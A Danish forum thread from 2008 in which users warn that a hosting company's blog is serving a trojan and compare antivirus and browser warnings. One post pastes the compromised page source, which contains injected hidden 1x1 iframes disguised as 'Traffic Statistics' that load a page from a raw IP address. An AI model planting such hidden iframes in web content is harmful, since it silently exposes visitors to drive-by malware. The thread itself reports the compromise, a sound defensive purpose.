mboost-dp1

ADVARSEL: Trojan på needhost

Gå til bund
Gravatar #1 - siliankaas
10. sep. 2008 15:33
ADVARSEL

Jf mit Kaspersky Antivirus forsøger siden http://blog.needhost.eu/ at sende mig en Trojan.

Jeg skrev til deres support i går og gjorde dem opmærksom på problemet, men har intet svar fået, og i dag forsøger deres blog stadigvæk at sende mig en trojan.

Ved godt det måske er svært at få nogle til at teste - men jeg prøver alligevel: Er der nogle der kan af / bekræfte at der er en Trojan?
Gravatar #2 - apkat
10. sep. 2008 15:37
firefox siger:
Reported Attack Site!
This web site at blog.needhost.eu has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

så du ikke alene ;)
men hvorvidt det er en trojan eller ej skal jeg ikke kunne sige.
Gravatar #3 - siliankaas
10. sep. 2008 15:38
#2 Tak for indput - må indrømme jeg kun har brugt Ie til at teste med! -Heldigvis virkede mit kaspersky da :-)

EDIT: Det skal i øvrigt lige siges at jeg forsøgte at undgå at linket blev vist som et aktiv link - men det lykkedes åbenbart ikke - beklager.
Gravatar #4 - siliankaas
10. sep. 2008 15:43
Jeg kan tilføje at der står følgende i kildekoden: (ved ikke om det har interesse)

<p>First of all, thank<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> you for reading our blog. It is greatly appreciated.</p>
<p>Second, we are proud to present a new line of languages. Therefore we will write all blog, maintenance and service announcements in english, in the future. The new languages are; English, Deutsch, Spanish and Swedish. So now we got 5 different languages to chose from, including te danish.</p>
<p>Third matter in this blog entry, is regarding our forum. We have made some changes, due to the new releases of our foreign sites. From now on there&#8217;s a forum to each language.</p>
<p>When you click the link from the proper fontpage on needhost.xx you will be redirected to your own language on the forum. From here you can click back or at the logo, to see all the other languages on the forums.</p>
<p>As<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> for the last note, we hope that you will enjoy our new languages and opportunities which this brings.</p>
<p>Remember that our english live support is online 24/7 - and they are there to help you.</p>

Det ligner jo ikke Virus/Trojan (??)

Edit: Hmm, hvis man besøger den IP får man bare en side med teksten:
asasasa
- så er den nok ikke helt stueren :-(

Skod de ikke gøre noget ved det, når man gør dem opmærksom på problemet.
Gravatar #5 - Ronson ⅍
10. sep. 2008 15:53
Det er noget javascript-exploit eller sådan noget ser det ud til

newz.html
(tryk blot, det er tekstificeret)
Gravatar #6 - siliankaas
10. sep. 2008 16:11
#5 Er det - hvad der bliver forsøgt hentet?

Hvis Ja - er der nogle der kan gennemskue hvad det rent faktisk er?

Edit: Det kan man vist ik ;-)
Hmm strange - men jeg er da ret sikker på det er en vira/trojan så.
Gravatar #7 - Lss_1405
10. sep. 2008 16:18
Jeg henter det gerne til min mac, og scanner filen med norton
Gravatar #8 - milandt
11. sep. 2008 07:01
#4 Jeg ville mene at blot det at siden har en iframe burde være grund nok til at blackliste det.
Gå til top

Opret dig som bruger i dag

Det er gratis, og du binder dig ikke til noget.

Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.

Opret Bruger Login